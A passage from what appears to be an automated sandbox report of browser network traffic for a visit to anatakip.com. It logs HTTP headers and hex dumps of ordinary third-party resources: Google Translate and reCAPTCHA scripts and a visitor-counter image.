                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: cross-site
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:57:42 UTC373INHTTP/1.1 307 Temporary Redirect
                    Date: Sun, 26 May 2024 22:57:42 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    cache-control: no-cache, no-store, must-revalidate
                    location: https://widgets.amung.us/classic/14/1454.png
                    CF-Cache-Status: DYNAMIC
                    Server: cloudflare
                    CF-RAY: 88a15da14bf7420b-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:57:42 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    34192.168.2.549760142.250.185.1424433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:42 UTC665OUTGET /translate_a/element.js?cb=googleTranslateElementInit HTTP/1.1
                    Host: translate.google.com
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: */*
                    X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                    Sec-Fetch-Site: cross-site
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: script
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:57:42 UTC698INHTTP/1.1 200 OK
                    Content-Type: text/javascript; charset=utf-8
                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                    Pragma: no-cache
                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                    Date: Sun, 26 May 2024 22:57:42 GMT
                    Cross-Origin-Resource-Policy: cross-origin
                    Cross-Origin-Opener-Policy: same-origin-allow-popups
                    Server: ESF
                    X-XSS-Protection: 0
                    X-Frame-Options: SAMEORIGIN
                    X-Content-Type-Options: nosniff
                    Set-Cookie: __Secure-BUCKET=COcE; Domain=.google.com; Expires=Fri, 22-Nov-2024 22:57:42 GMT; Path=/; Secure; HttpOnly; SameSite=lax
                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                    Accept-Ranges: none
                    Vary: Accept-Encoding
                    Connection: close
                    Transfer-Encoding: chunked
                    2024-05-26 22:57:42 UTC692INData Raw: 38 30 30 30 0d 0a 0a 20 20 20 20 2f 2f 20 67 6f 2f 6d 73 73 2d 73 65 74 75 70 23 37 2d 6c 6f 61 64 2d 74 68 65 2d 6a 73 2d 6f 72 2d 63 73 73 2d 66 72 6f 6d 2d 79 6f 75 72 2d 69 6e 69 74 69 61 6c 2d 70 61 67 65 0a 20 20 20 20 69 66 28 21 77 69 6e 64 6f 77 5b 27 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 27 5d 29 20 7b 0a 20 20 20 20 20 20 63 6f 6e 73 74 20 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 20 3d 20 77 69 6e 64 6f 77 5b 27 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 27 5d 20 7c 7c 20 66 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0a 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 65 3b 0a 20 20 20 20 20 20 7d 3b 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 5b 27 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 27 5d 20 3d 20 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 3b 0a 20 20
                    Data Ascii: 8000 // go/mss-setup#7-load-the-js-or-css-from-your-initial-page if(!window['_DumpException']) { const _DumpException = window['_DumpException'] || function(e) { throw e; }; window['_DumpException'] = _DumpException;
                    2024-05-26 22:57:42 UTC1390INData Raw: 62 2c 69 62 2c 76 2c 6b 62 2c 6e 62 2c 6f 62 2c 70 62 2c 72 62 2c 76 62 3b 5f 2e 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 45 72 72 6f 72 2e 63 61 70 74 75 72 65 53 74 61 63 6b 54 72 61 63 65 29 45 72 72 6f 72 2e 63 61 70 74 75 72 65 53 74 61 63 6b 54 72 61 63 65 28 74 68 69 73 2c 5f 2e 61 61 29 3b 65 6c 73 65 7b 76 61 72 20 63 3d 45 72 72 6f 72 28 29 2e 73 74 61 63 6b 3b 63 26 26 28 74 68 69 73 2e 73 74 61 63 6b 3d 63 29 7d 61 26 26 28 74 68 69 73 2e 6d 65 73 73 61 67 65 3d 53 74 72 69 6e 67 28 61 29 29 3b 76 6f 69 64 20 30 21 3d 3d 62 26 26 28 74 68 69 73 2e 63 61 75 73 65 3d 62 29 7d 3b 62 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 3d 61 2e 73 70 6c 69 74 28 22 25 73 22 29 3b 66 6f 72 28 76 61 72 20 63 3d 22 22 2c 64 3d 61 2e
                    Data Ascii: b,ib,v,kb,nb,ob,pb,rb,vb;_.aa=function(a,b){if(Error.captureStackTrace)Error.captureStackTrace(this,_.aa);else{var c=Error().stack;c&&(this.stack=c)}a&&(this.message=String(a));void 0!==b&&(this.cause=b)};ba=function(a,b){a=a.split("%s");for(var c="",d=a.
                    2024-05-26 22:57:42 UTC1390INData Raw: 72 41 74 28 30 29 2b 66 3b 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 65 2c 67 29 7c 7c 28 65 5b 67 5d 3d 21 30 2c 62 5b 63 2b 2b 5d 3d 66 29 7d 62 2e 6c 65 6e 67 74 68 3d 63 7d 3b 5f 2e 43 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 5f 2e 74 2e 6e 61 76 69 67 61 74 6f 72 3b 72 65 74 75 72 6e 20 61 26 26 28 61 3d 61 2e 75 73 65 72 41 67 65 6e 74 29 3f 61 3a 22 22 7d 3b 5f 2e 75 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 2d 31 21 3d 5f 2e 43 61 28 29 2e 69 6e 64 65 78 4f 66 28 61 29 7d 3b 5f 2e 46 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 44 61 3f 21 21 5f 2e 45 61 26 26 30 3c 5f 2e 45 61 2e 62 72 61 6e 64 73 2e 6c 65 6e 67 74 68 3a 21 31
                    Data Ascii: rAt(0)+f;Object.prototype.hasOwnProperty.call(e,g)||(e[g]=!0,b[c++]=f)}b.length=c};_.Ca=function(){var a=_.t.navigator;return a&&(a=a.userAgent)?a:""};_.u=function(a){return-1!=_.Ca().indexOf(a)};_.Fa=function(){return _.Da?!!_.Ea&&0<_.Ea.brands.length:!1
                    2024-05-26 22:57:42 UTC1390INData Raw: 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 5f 2e 59 61 2e 61 70 70 6c 79 28 31 2c 61 72 67 75 6d 65 6e 74 73 29 3b 69 66 28 30 3d 3d 3d 62 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 5f 2e 5a 61 28 61 5b 30 5d 29 3b 66 6f 72 28 76 61 72 20 63 3d 61 5b 30 5d 2c 64 3d 30 3b 64 3c 62 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 63 2b 3d 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 62 5b 64 5d 29 2b 61 5b 64 2b 31 5d 3b 72 65 74 75 72 6e 20 5f 2e 5a 61 28 63 29 7d 3b 5f 2e 61 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 2c 63 3b 72 65 74 75 72 6e 28 61 3d 6e 75 6c 6c 3d 3d 28 63 3d 28 62 3d 61 2e 64 6f 63 75 6d 65 6e 74 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 29 3f 76 6f 69 64 20 30 3a 63 2e 63 61 6c 6c 28 62 2c 22 73 63 72 69 70 74
                    Data Ascii: nction(a){var b=_.Ya.apply(1,arguments);if(0===b.length)return _.Za(a[0]);for(var c=a[0],d=0;d<b.length;d++)c+=encodeURIComponent(b[d])+a[d+1];return _.Za(c)};_.ab=function(a){var b,c;return(a=null==(c=(b=a.document).querySelector)?void 0:c.call(b,"script
                    2024-05-26 22:57:42 UTC1390INData Raw: 3a 21 30 2c 76 61 6c 75 65 3a 67 7d 29 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 67 7d 3b 76 61 72 20 63 3d 22 6a 73 63 6f 6d 70 5f 73 79 6d 62 6f 6c 5f 22 2b 28 31 45 39 2a 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 3e 3e 3e 30 29 2b 22 5f 22 2c 64 3d 30 2c 65 3d 66 75 6e 63 74 69 6f 6e 28 66 29 7b 69 66 28 74 68 69 73 20 69 6e 73 74 61 6e 63 65 6f 66 20 65 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 62 22 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 62 28 63 2b 28 66 7c 7c 22 22 29 2b 22 5f 22 2b 64 2b 2b 2c 66 29 7d 3b 72 65 74 75 72 6e 20 65 7d 29 3b 0a 76 28 22 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29
                    Data Ascii: :!0,value:g})};b.prototype.toString=function(){return this.g};var c="jscomp_symbol_"+(1E9*Math.random()>>>0)+"_",d=0,e=function(f){if(this instanceof e)throw new TypeError("b");return new b(c+(f||"")+"_"+d++,f)};return e});v("Symbol.iterator",function(a)
                    2024-05-26 22:57:42 UTC1390INData Raw: 6e 28 29 7b 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 3d 61 3b 72 65 74 75 72 6e 20 6e 65 77 20 62 7d 3b 0a 5f 2e 71 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 7d 6e 65 77 20 63 3b 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 63 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 63 20 69 6e 73 74 61 6e 63 65 6f 66 20 63 7d 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 52 65 66 6c 65 63 74 26 26 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 29 7b 69 66 28 61 28 29 29 72 65 74 75 72 6e 20 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3b 76 61 72 20 62 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3b 72
                    Data Ascii: n(){};b.prototype=a;return new b};_.qb=function(){function a(){function c(){}new c;Reflect.construct(c,[],function(){});return new c instanceof c}if("undefined"!=typeof Reflect&&Reflect.construct){if(a())return Reflect.construct;var b=Reflect.construct;r
                    2024-05-26 22:57:42 UTC1390INData Raw: 6e 28 68 29 7b 68 28 67 29 7d 29 7d 69 66 28 61 29 72 65 74 75 72 6e 20 61 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 68 3d 66 75 6e 63 74 69 6f 6e 28 67 29 7b 69 66 28 6e 75 6c 6c 3d 3d 74 68 69 73 2e 67 29 7b 74 68 69 73 2e 67 3d 5b 5d 3b 76 61 72 20 68 3d 74 68 69 73 3b 74 68 69 73 2e 6a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 68 2e 6f 28 29 7d 29 7d 74 68 69 73 2e 67 2e 70 75 73 68 28 67 29 7d 3b 76 61 72 20 64 3d 5f 2e 6a 62 2e 73 65 74 54 69 6d 65 6f 75 74 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 6a 3d 66 75 6e 63 74 69 6f 6e 28 67 29 7b 64 28 67 2c 30 29 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 3b 74 68 69 73 2e 67 26 26 74 68 69 73 2e 67 2e 6c 65 6e 67 74 68 3b 29 7b 76 61 72 20 67 3d 74 68 69 73 2e 67 3b
                    Data Ascii: n(h){h(g)})}if(a)return a;b.prototype.h=function(g){if(null==this.g){this.g=[];var h=this;this.j(function(){h.o()})}this.g.push(g)};var d=_.jb.setTimeout;b.prototype.j=function(g){d(g,0)};b.prototype.o=function(){for(;this.g&&this.g.length;){var g=this.g;
                    2024-05-26 22:57:42 UTC1390INData Raw: 74 75 72 6e 21 31 3b 76 61 72 20 67 3d 5f 2e 6a 62 2e 43 75 73 74 6f 6d 45 76 65 6e 74 2c 0a 68 3d 5f 2e 6a 62 2e 45 76 65 6e 74 2c 6c 3d 5f 2e 6a 62 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 3b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 3d 74 79 70 65 6f 66 20 6c 29 72 65 74 75 72 6e 21 30 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 67 3f 67 3d 6e 65 77 20 67 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 68 3f 67 3d 6e 65 77 20 68 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3a 28 67 3d 5f 2e 6a 62 2e 64 6f 63 75 6d 65 6e 74 2e 63 72
                    Data Ascii: turn!1;var g=_.jb.CustomEvent,h=_.jb.Event,l=_.jb.dispatchEvent;if("undefined"===typeof l)return!0;"function"===typeof g?g=new g("unhandledrejection",{cancelable:!0}):"function"===typeof h?g=new h("unhandledrejection",{cancelable:!0}):(g=_.jb.document.cr
                    2024-05-26 22:57:42 UTC1390INData Raw: 42 3b 71 2d 2d 3b 30 3d 3d 71 26 26 6d 28 72 29 7d 7d 76 61 72 20 72 3d 5b 5d 2c 71 3d 30 3b 64 6f 20 72 2e 70 75 73 68 28 76 6f 69 64 20 30 29 2c 71 2b 2b 2c 63 28 6c 2e 76 61 6c 75 65 29 2e 48 64 28 70 28 72 2e 6c 65 6e 67 74 68 2d 31 29 2c 6e 29 2c 6c 3d 68 2e 6e 65 78 74 28 29 3b 77 68 69 6c 65 28 21 6c 2e 64 6f 6e 65 29 7d 29 7d 3b 72 65 74 75 72 6e 20 65 7d 29 3b 0a 76 61 72 20 77 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 6e 75 6c 6c 3d 3d 61 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 6b 60 22 2b 63 29 3b 69 66 28 62 20 69 6e 73 74 61 6e 63 65 6f 66 20 52 65 67 45 78 70 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 6c 60 22 2b 63 29 3b 72 65 74 75 72 6e 20 61 2b 22 22 7d 3b 76 28 22 53
                    Data Ascii: B;q--;0==q&&m(r)}}var r=[],q=0;do r.push(void 0),q++,c(l.value).Hd(p(r.length-1),n),l=h.next();while(!l.done)})};return e});var wb=function(a,b,c){if(null==a)throw new TypeError("k`"+c);if(b instanceof RegExp)throw new TypeError("l`"+c);return a+""};v("S
                    2024-05-26 22:57:42 UTC1390INData Raw: 29 3f 6c 5b 66 5d 5b 74 68 69 73 2e 67 5d 3a 76 6f 69 64 20 30 7d 3b 68 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 72 65 74 75 72 6e 20 63 28 6c 29 26 26 6e 62 28 6c 2c 66 29 26 26 6e 62 28 6c 5b 66 5d 2c 74 68 69 73 2e 67 29 7d 3b 68 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 6c 65 74 65 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 72 65 74 75 72 6e 20 63 28 6c 29 26 26 0a 6e 62 28 6c 2c 66 29 26 26 6e 62 28 6c 5b 66 5d 2c 74 68 69 73 2e 67 29 3f 64 65 6c 65 74 65 20 6c 5b 66 5d 5b 74 68 69 73 2e 67 5d 3a 21 31 7d 3b 72 65 74 75 72 6e 20 68 7d 29 3b 0a 76 28 22 4d 61 70 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 61 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66
                    Data Ascii: )?l[f][this.g]:void 0};h.prototype.has=function(l){return c(l)&&nb(l,f)&&nb(l[f],this.g)};h.prototype.delete=function(l){return c(l)&&nb(l,f)&&nb(l[f],this.g)?delete l[f][this.g]:!1};return h});v("Map",function(a){if(function(){if(!a||"function"!=typeof


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    35192.168.2.549759142.250.186.1004433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:42 UTC623OUTGET /recaptcha/api.js HTTP/1.1
                    Host: www.google.com
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: */*
                    X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                    Sec-Fetch-Site: cross-site
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: script
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:57:42 UTC528INHTTP/1.1 200 OK
                    Content-Type: text/javascript; charset=utf-8
                    Expires: Sun, 26 May 2024 22:57:42 GMT
                    Date: Sun, 26 May 2024 22:57:42 GMT
                    Cache-Control: private, max-age=300
                    Cross-Origin-Resource-Policy: cross-origin
                    X-Content-Type-Options: nosniff
                    X-Frame-Options: SAMEORIGIN
                    Content-Security-Policy: frame-ancestors 'self'
                    X-XSS-Protection: 1; mode=block
                    Server: GSE
                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                    Accept-Ranges: none
                    Vary: Accept-Encoding
                    Connection: close
                    Transfer-Encoding: chunked
                    2024-05-26 22:57:42 UTC862INData Raw: 35 38 36 0d 0a 2f 2a 20 50 4c 45 41 53 45 20 44 4f 20 4e 4f 54 20 43 4f 50 59 20 41 4e 44 20 50 41 53 54 45 20 54 48 49 53 20 43 4f 44 45 2e 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 77 3d 77 69 6e 64 6f 77 2c 43 3d 27 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 27 2c 63 66 67 3d 77 5b 43 5d 3d 77 5b 43 5d 7c 7c 7b 7d 2c 4e 3d 27 67 72 65 63 61 70 74 63 68 61 27 3b 76 61 72 20 67 72 3d 77 5b 4e 5d 3d 77 5b 4e 5d 7c 7c 7b 7d 3b 67 72 2e 72 65 61 64 79 3d 67 72 2e 72 65 61 64 79 7c 7c 66 75 6e 63 74 69 6f 6e 28 66 29 7b 28 63 66 67 5b 27 66 6e 73 27 5d 3d 63 66 67 5b 27 66 6e 73 27 5d 7c 7c 5b 5d 29 2e 70 75 73 68 28 66 29 3b 7d 3b 77 5b 27 5f 5f 72 65 63 61 70 74 63 68 61 5f 61 70 69 27 5d 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67
                    Data Ascii: 586/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.g
                    2024-05-26 22:57:42 UTC559INData Raw: 72 65 63 61 74 69 6f 6e 4c 61 62 65 6c 2e 67 65 74 56 61 6c 75 65 28 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 69 66 28 6c 21 3d 3d 27 74 72 65 61 74 6d 65 6e 74 5f 31 2e 31 27 26 26 6c 21 3d 3d 27 74 72 65 61 74 6d 65 6e 74 5f 31 2e 32 27 26 26 6c 21 3d 3d 27 63 6f 6e 74 72 6f 6c 5f 31 2e 31 27 29 7b 64 2e 68 65 61 64 2e 70 72 65 70 65 6e 64 28 6d 29 3b 7d 7d 29 3b 7d 65 6c 73 65 7b 64 2e 68 65 61 64 2e 70 72 65 70 65 6e 64 28 6d 29 3b 7d 70 6f 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 72 65 6c 65 61 73 65 73 2f 6a 6f 48 41 36 30 4d 65 4d 45 2d 50 4e 76 69 4c 35 39 78 56 48 39 7a 73 2f 72 65 63 61 70 74 63 68 61 5f 5f 65 6e 2e 6a 73 27 3b 70 6f 2e 63 72 6f 73 73
                    Data Ascii: recationLabel.getValue().then(function(l){if(l!=='treatment_1.1'&&l!=='treatment_1.2'&&l!=='control_1.1'){d.head.prepend(m);}});}else{d.head.prepend(m);}po.src='https://www.gstatic.com/recaptcha/releases/joHA60MeME-PNviL59xVH9zs/recaptcha__en.js';po.cross
                    2024-05-26 22:57:42 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    36192.168.2.549765104.22.74.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:43 UTC591OUTGET /classic/14/1454.png HTTP/1.1
                    Host: widgets.amung.us
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: cross-site
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:57:43 UTC431INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:57:43 GMT
                    Content-Type: image/png
                    Content-Length: 1652
                    Connection: close
                    last-modified: Sun, 13 Jun 2010 09:03:11 GMT
                    etag: "4c149ecf-674"
                    expires: Fri, 24 May 2024 14:02:49 GMT
                    Cache-Control: max-age=2678400
                    access-control-allow-origin: *
                    alt-svc: h3=":443"; ma=86400
                    CF-Cache-Status: HIT
                    Age: 291294
                    Accept-Ranges: bytes
                    Server: cloudflare
                    CF-RAY: 88a15da5dcc89e04-EWR
                    2024-05-26 22:57:43 UTC938INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 51 00 00 00 1d 08 03 00 00 00 e5 cb 70 13 00 00 02 d3 50 4c 54 45 ff ff ff c6 c6 c6 ac ac ac e3 e3 e3 bb bb bb d4 d4 d4 be be be 7d 7d 7d 77 77 77 b9 b9 b9 b7 b7 b7 e7 e7 e7 74 74 74 e4 e4 e4 ae ae ae c9 c9 c9 8e 8e 8e 99 99 99 d6 d6 d6 ea ea ea 80 80 80 95 95 95 d3 d3 d3 e9 e9 e9 7a 7a 7a d1 d1 d1 e1 e1 e1 c7 c7 c7 76 76 76 72 72 72 e2 e2 e2 90 90 90 92 92 92 93 93 93 a5 a5 a5 ad ad ad aa aa aa a8 a8 a8 a6 a6 a6 a4 a4 a4 8d 8d 8d e8 e8 e8 a2 a2 a2 d0 d0 d0 70 70 70 cf cf cf a0 a0 a0 ff ff ff 5c 5c 5c 28 28 28 0c 0c 0c 35 35 35 c1 27 2d 08 08 08 30 30 30 05 05 05 02 02 02 45 45 45 38 38 38 10 10 10 2d 2d 2d 41 41 41 51 51 51 3d 3d 3d 7d 27 2a 68 24 27 58 58 58 b6 26 2c 88 37 3b 7f 37 3b 52 4a 4a 8c
                    Data Ascii: PNGIHDRQpPLTE}}}wwwtttzzzvvvrrrppp\\\(((555'-000EEE888---AAAQQQ===}'*h$'XXX&,7;7;RJJ
                    2024-05-26 22:57:43 UTC714INData Raw: 70 31 e5 d8 1c e8 40 71 63 5a f8 9c 95 30 2a b1 5b d2 99 ed cf 5f 25 26 1c 4c 6f 8f b2 86 6b a8 a5 c4 4a 7d ff fb 0d af a3 af 59 1f 9e 64 c7 a8 a5 d4 42 cc da 75 9d 38 f5 ef 42 56 2d 7e 29 c9 49 96 60 29 e3 59 4b ee 46 74 d5 67 96 9a 63 18 39 8e a9 aa fa f6 fb 37 a9 9f 55 95 b6 a9 3b 54 0d 3f 0c 20 51 0d 92 08 3c 6d 51 30 2c 32 32 32 51 97 a9 ea b9 6b 18 65 d5 3b 25 e9 f0 7f d4 ba f5 bf 2c 61 c3 27 2f 48 54 83 d1 f8 34 0c 95 82 18 fb b1 16 01 11 6d 32 49 2a 6e 21 d7 d8 92 27 bf 71 97 fa 53 96 e5 cf d8 74 77 8e 4c 19 8c 76 19 0c b2 9e 01 fa ca b1 76 59 ee 4b 7a 70 26 cb e3 c9 35 56 96 96 2b 7f df 22 a6 2b 3f 29 8a 36 de da ab f8 40 82 a2 d7 a7 37 09 e3 14 a5 0b 74 4e 88 eb a2 cf 14 85 e7 31 12 f2 84 ea 15 77 88 82 fc 02 41 78 e7 c3 69 74 be 93 2f 78 41 bc
                    Data Ascii: p1@qcZ0*[_%&LokJ}YdBu8BV-~)I`)YKFtgc97U;T? Q<mQ0,222Qke;%,a'/HT4m2I*n!'qStwLvvYKzp&5V+"+?)6@7tN1wAxit/xA


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    37192.168.2.549772104.22.74.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:43 UTC359OUTGET /classic/14/1454.png HTTP/1.1
                    Host: widgets.amung.us
                    Connection: keep-alive
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    Accept: */*
                    Sec-Fetch-Site: none
                    Sec-Fetch-Mode: cors
                    Sec-Fetch-Dest: empty
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:57:44 UTC431INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:57:44 GMT
                    Content-Type: image/png
                    Content-Length: 1652
                    Connection: close
                    last-modified: Sun, 13 Jun 2010 09:03:11 GMT
                    etag: "4c149ecf-674"
                    expires: Fri, 24 May 2024 14:02:49 GMT
                    Cache-Control: max-age=2678400
                    access-control-allow-origin: *
                    alt-svc: h3=":443"; ma=86400
                    CF-Cache-Status: HIT
                    Age: 291295
                    Accept-Ranges: bytes
                    Server: cloudflare
                    CF-RAY: 88a15daa7f19c3ee-EWR
